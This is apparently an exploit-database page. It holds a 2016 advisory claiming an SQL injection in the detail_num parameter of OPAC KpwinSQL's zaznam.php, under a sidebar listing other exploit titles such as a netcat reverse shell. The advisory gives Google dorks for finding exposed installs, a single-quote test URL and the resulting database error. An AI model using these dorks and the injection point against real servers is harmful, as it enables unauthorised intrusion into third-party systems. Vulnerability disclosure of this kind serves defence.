
14 new exploits Linux Netcat Reverse Shell - 32bit - 77 bytes XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability Linux x86_64 execve Shellcode - 15 bytes WordPress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload OPAC KpwinSQL - SQL Injection Magnet Networks Tesley CPVA 642 Router – Weak WPA-PSK Passphrase Algorithm Option CloudGate CG0192-11897 - Multiple Vulnerabilities Kagao 3.0 - Multiple Vulnerabilities Panda Security Multiple Products - Privilege Escalation MyLittleForum 2.3.5 - PHP Command Injection iBilling 3.7.0 - Stored and Reflected XSS PInfo 0.6.9-5.1 - Local Buffer Overflow BigTree CMS 4.2.11 - SQL Injection HNB 1.9.18-10 - Local Buffer Overflow Linux x86 /bin/sh Shellcode + ASLR Bruteforce SugarCRM 6.5.18 - PHP Code Injection Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities
31 lines
No EOL
943 B
Text
Executable file
31 lines
No EOL
943 B
Text
Executable file
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
|
|
|
Product -> OPAC KpwinSQL - SQL Injection
|
|
Date -> 6/24/2016
|
|
Author -> bRpsd
|
|
Skype: vegnox
|
|
Vendor HomePage -> http://www.kpsys.cz/
|
|
Product Download -> http://www.kpsys.cz/kpwinsql/demo.html
|
|
Product Version -> / All
|
|
SQL Version -> Firebird 1.5.3
|
|
OS -> Win98SE, Me, NT, 2000, XP, 2003, Vista
|
|
|
|
|
|
Dork -> intitle:"WWW OPAC KpwinSQL"
|
|
Dork2 -> inurl:zaznam.php?detail_num=
|
|
Dork3 -> inurl:opacsql2_0
|
|
|
|
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
|
|
|
|
|
|
File: zanzam.php
|
|
Parameter: detail_num
|
|
|
|
|
|
|
|
Test > http://localhost:8888/zaznam.php?detail_num=1'
|
|
|
|
|
|
Response:
|
|
|
|
24-06-2016 08:52:21: localhost: CHYBA: 2 WARNING: ibase_query(): Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 40 :In: "C:\wwwopac\functions.php" (Line: 5462) : URL:"/zaznam.php?detail_num=1%27"Pri zpracovani pozadavku doslo k chybe, omlouvame se ... |